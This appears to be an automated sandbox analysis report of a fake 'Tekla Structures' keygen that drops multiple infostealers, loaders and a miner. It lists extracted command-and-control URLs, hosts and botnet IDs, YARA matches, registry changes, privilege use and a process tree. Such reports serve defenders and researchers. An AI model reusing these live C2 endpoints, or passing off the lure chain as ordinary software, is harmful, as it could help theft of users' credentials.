azorult | a4ad73961ce0d5dc1289045900eed2e4fc379071e84eeec9019630fd13fdf923

Analysis

max time kernel
148s
max time network
599s
platform
windows10_x64
resource
win10v20201028
submitted
03/04/2021, 07:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Tekla_Structures_Multiuser_serial_number_keygen_by_orion.exe

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://labsclub.com/welcome

Extracted

Family

azorult

http://kvaka.li/1210776429.php

Extracted

Family

pony

http://www.oldhorse.info

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

fickerstealer

deniedfight.com:80

untouchablename.com:80

Extracted

Family

redline

Botnet

rimu

rlmushahel.xyz:80

Extracted

Family

redline

Botnet

02042021

panenewak.xyz:80

Extracted

Family

smokeloader

Version

2020

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32

Extracted

Family

raccoon

Botnet

afefd33a49c7cbd55d417545269920f24c85aa37

Attributes

url4cnc
https://telete.in/jagressor_kz

rc4.plain

Extracted

Family

redline

Botnet

bbb

135.181.170.166:31114

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 3 IoCs

resource	yara_rule
behavioral3/memory/4172-166-0x0000000000400000-0x0000000000D24000-memory.dmp	family_glupteba
behavioral3/memory/4172-170-0x0000000002510000-0x0000000002E1A000-memory.dmp	family_glupteba
behavioral3/memory/4172-172-0x0000000000400000-0x0000000000D24000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
rat netsupport
Pony,Fareit
Pony is a Remote Access Trojan application that steals information.
rat spyware stealer pony
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 3 IoCs

resource	yara_rule
behavioral3/memory/4684-379-0x0000000000400000-0x0000000000430000-memory.dmp	family_redline
behavioral3/memory/16976-463-0x0000000000400000-0x0000000000430000-memory.dmp	family_redline
behavioral3/memory/16512-954-0x0000000000400000-0x0000000000430000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Taurus Stealer
Taurus is an infostealer first seen in June 2020.
trojan stealer taurus

Taurus Stealer Payload 1 IoCs

resource	yara_rule
behavioral3/memory/2428-490-0x0000000000400000-0x000000000587C000-memory.dmp	family_taurus_stealer

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
fickerstealer
Ficker is an infostealer written in Rust and ASM.
infostealer fickerstealer
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

CustAttr .NET packer 1 IoCs

Detects CustAttr .NET packer in memory.

resource	yara_rule
behavioral3/memory/12960-685-0x0000000005490000-0x0000000005494000-memory.dmp	CustAttr

Vidar Stealer 4 IoCs

stealer

resource	yara_rule
behavioral3/memory/4568-152-0x0000000000400000-0x0000000000450000-memory.dmp	Vidar
behavioral3/memory/4568-151-0x0000000001900000-0x000000000194C000-memory.dmp	Vidar
behavioral3/memory/4824-541-0x0000000000600000-0x0000000000697000-memory.dmp	Vidar
behavioral3/memory/4824-542-0x0000000000400000-0x0000000000498000-memory.dmp	Vidar

XMRig Miner Payload 7 IoCs

miner

resource	yara_rule
behavioral3/memory/6452-392-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral3/memory/6452-394-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral3/memory/6452-442-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral3/memory/13532-701-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral3/memory/13532-800-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral3/memory/7656-1023-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral3/memory/7656-1071-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig

Downloads MZ/PE file

Executes dropped EXE 11 IoCs

pid	Process
2292	keygen-pr.exe
3772	keygen-step-1.exe
3912	keygen-step-3.exe
3752	keygen-step-4.exe
1900	Setup.exe
1748	key.exe
2484	key.exe
612	multitimer.exe
3180	setups.exe
2976	setups.tmp
3776	askinstall20.exe

Loads dropped DLL 7 IoCs

pid	Process
2976	setups.tmp
2976	setups.tmp
2976	setups.tmp
2976	setups.tmp
2976	setups.tmp
2976	setups.tmp
2976	setups.tmp

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 14 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
122	ipinfo.io
293	api.ipify.org
186	api.ipify.org
282	ipinfo.io
368	ip-api.com
507	ipinfo.io
550	ipinfo.io
624	api.ipify.org
643	ipinfo.io
125	ipinfo.io
182	ip-api.com
279	ipinfo.io
482	api.ipify.org
663	ipinfo.io

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1748 set thread context of 2484	1748	key.exe	91

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 16 IoCs

pid	pid_target	Process	procid_target
15060	4824	WerFault.exe	160
15240	4824	WerFault.exe	160
16048	4824	WerFault.exe	160
5132	4824	WerFault.exe	160
16060	4824	WerFault.exe	160
16404	4824	WerFault.exe	160
15864	4824	WerFault.exe	160
6292	4824	WerFault.exe	160
6808	4824	WerFault.exe	160
6956	4824	WerFault.exe	160
7020	4824	WerFault.exe	160
6208	4824	WerFault.exe	160
7476	4824	WerFault.exe	160
7836	4824	WerFault.exe	160
9156	5024	WerFault.exe	124
14056	4332	WerFault.exe	366

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
6792	timeout.exe
11104	timeout.exe

Kills process with taskkill 10 IoCs

evasion

pid	Process
9368	taskkill.exe
15952	taskkill.exe
4536	taskkill.exe
16988	taskkill.exe
8008	taskkill.exe
8988	taskkill.exe
12128	taskkill.exe
5500	taskkill.exe
952	taskkill.exe
5060	taskkill.exe

Modifies registry class 48 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 6c3a3b6c55add601	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberCompleted = "1"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 6c3a3b6c55add601	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 6c3a3b6c55add601	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersio = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming	MicrosoftEdge.exe

Runs ping.exe 1 TTPs 5 IoCs

Remote System Discovery

T1018

pid	Process
4360	PING.EXE
4984	PING.EXE
13780	PING.EXE
4388	PING.EXE
4000	PING.EXE

Script User-Agent 12 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	124	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	506	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	512	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	553	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	665	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	129	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	280	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	290	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	547	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	642	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	645	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	661	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2976	setups.tmp
2976	setups.tmp

Suspicious use of AdjustPrivilegeToken 36 IoCs

description	pid	Process
Token: SeDebugPrivilege	1900	Setup.exe
Token: SeCreateTokenPrivilege	3776	askinstall20.exe
Token: SeAssignPrimaryTokenPrivilege	3776	askinstall20.exe
Token: SeLockMemoryPrivilege	3776	askinstall20.exe
Token: SeIncreaseQuotaPrivilege	3776	askinstall20.exe
Token: SeMachineAccountPrivilege	3776	askinstall20.exe
Token: SeTcbPrivilege	3776	askinstall20.exe
Token: SeSecurityPrivilege	3776	askinstall20.exe
Token: SeTakeOwnershipPrivilege	3776	askinstall20.exe
Token: SeLoadDriverPrivilege	3776	askinstall20.exe
Token: SeSystemProfilePrivilege	3776	askinstall20.exe
Token: SeSystemtimePrivilege	3776	askinstall20.exe
Token: SeProfSingleProcessPrivilege	3776	askinstall20.exe
Token: SeIncBasePriorityPrivilege	3776	askinstall20.exe
Token: SeCreatePagefilePrivilege	3776	askinstall20.exe
Token: SeCreatePermanentPrivilege	3776	askinstall20.exe
Token: SeBackupPrivilege	3776	askinstall20.exe
Token: SeRestorePrivilege	3776	askinstall20.exe
Token: SeShutdownPrivilege	3776	askinstall20.exe
Token: SeDebugPrivilege	3776	askinstall20.exe
Token: SeAuditPrivilege	3776	askinstall20.exe
Token: SeSystemEnvironmentPrivilege	3776	askinstall20.exe
Token: SeChangeNotifyPrivilege	3776	askinstall20.exe
Token: SeRemoteShutdownPrivilege	3776	askinstall20.exe
Token: SeUndockPrivilege	3776	askinstall20.exe
Token: SeSyncAgentPrivilege	3776	askinstall20.exe
Token: SeEnableDelegationPrivilege	3776	askinstall20.exe
Token: SeManageVolumePrivilege	3776	askinstall20.exe
Token: SeImpersonatePrivilege	3776	askinstall20.exe
Token: SeCreateGlobalPrivilege	3776	askinstall20.exe
Token: 31	3776	askinstall20.exe
Token: 32	3776	askinstall20.exe
Token: 33	3776	askinstall20.exe
Token: 34	3776	askinstall20.exe
Token: 35	3776	askinstall20.exe
Token: SeDebugPrivilege	612	multitimer.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
3180	setups.exe
2976	setups.tmp
1296	MicrosoftEdge.exe

Suspicious use of WriteProcessMemory 52 IoCs

description	pid	Process	procid_target
PID 1144 wrote to memory of 740	1144	Tekla_Structures_Multiuser_serial_number_keygen_by_orion.exe	79
PID 1144 wrote to memory of 740	1144	Tekla_Structures_Multiuser_serial_number_keygen_by_orion.exe	79
PID 1144 wrote to memory of 740	1144	Tekla_Structures_Multiuser_serial_number_keygen_by_orion.exe	79
PID 740 wrote to memory of 2292	740	cmd.exe	82
PID 740 wrote to memory of 2292	740	cmd.exe	82
PID 740 wrote to memory of 2292	740	cmd.exe	82
PID 740 wrote to memory of 3772	740	cmd.exe	83
PID 740 wrote to memory of 3772	740	cmd.exe	83
PID 740 wrote to memory of 3772	740	cmd.exe	83
PID 740 wrote to memory of 3912	740	cmd.exe	84
PID 740 wrote to memory of 3912	740	cmd.exe	84
PID 740 wrote to memory of 3912	740	cmd.exe	84
PID 740 wrote to memory of 3752	740	cmd.exe	85
PID 740 wrote to memory of 3752	740	cmd.exe	85
PID 740 wrote to memory of 3752	740	cmd.exe	85
PID 3752 wrote to memory of 1900	3752	keygen-step-4.exe	86
PID 3752 wrote to memory of 1900	3752	keygen-step-4.exe	86
PID 2292 wrote to memory of 1748	2292	keygen-pr.exe	87
PID 2292 wrote to memory of 1748	2292	keygen-pr.exe	87
PID 2292 wrote to memory of 1748	2292	keygen-pr.exe	87
PID 3912 wrote to memory of 3908	3912	keygen-step-3.exe	88
PID 3912 wrote to memory of 3908	3912	keygen-step-3.exe	88
PID 3912 wrote to memory of 3908	3912	keygen-step-3.exe	88
PID 3908 wrote to memory of 4000	3908	cmd.exe	90
PID 3908 wrote to memory of 4000	3908	cmd.exe	90
PID 3908 wrote to memory of 4000	3908	cmd.exe	90
PID 1748 wrote to memory of 2484	1748	key.exe	91
PID 1748 wrote to memory of 2484	1748	key.exe	91
PID 1748 wrote to memory of 2484	1748	key.exe	91
PID 1748 wrote to memory of 2484	1748	key.exe	91
PID 1748 wrote to memory of 2484	1748	key.exe	91
PID 1748 wrote to memory of 2484	1748	key.exe	91
PID 1748 wrote to memory of 2484	1748	key.exe	91
PID 1748 wrote to memory of 2484	1748	key.exe	91
PID 1748 wrote to memory of 2484	1748	key.exe	91
PID 1748 wrote to memory of 2484	1748	key.exe	91
PID 1748 wrote to memory of 2484	1748	key.exe	91
PID 1748 wrote to memory of 2484	1748	key.exe	91
PID 1748 wrote to memory of 2484	1748	key.exe	91
PID 1748 wrote to memory of 2484	1748	key.exe	91
PID 1748 wrote to memory of 2484	1748	key.exe	91
PID 1900 wrote to memory of 612	1900	Setup.exe	93
PID 1900 wrote to memory of 612	1900	Setup.exe	93
PID 1900 wrote to memory of 3180	1900	Setup.exe	94
PID 1900 wrote to memory of 3180	1900	Setup.exe	94
PID 1900 wrote to memory of 3180	1900	Setup.exe	94
PID 3180 wrote to memory of 2976	3180	setups.exe	95
PID 3180 wrote to memory of 2976	3180	setups.exe	95
PID 3180 wrote to memory of 2976	3180	setups.exe	95
PID 3752 wrote to memory of 3776	3752	keygen-step-4.exe	96
PID 3752 wrote to memory of 3776	3752	keygen-step-4.exe	96
PID 3752 wrote to memory of 3776	3752	keygen-step-4.exe	96

C:\Users\Admin\AppData\Local\Temp\Tekla_Structures_Multiuser_serial_number_keygen_by_orion.exe
"C:\Users\Admin\AppData\Local\Temp\Tekla_Structures_Multiuser_serial_number_keygen_by_orion.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1144
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:740
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
    keygen-pr.exe -p83fsase3Ge
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2292
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:1748
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat
        5⤵
        Executes dropped EXE
        
        PID:2484
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
    keygen-step-1.exe
    3⤵
    - Executes dropped EXE
    PID:3772
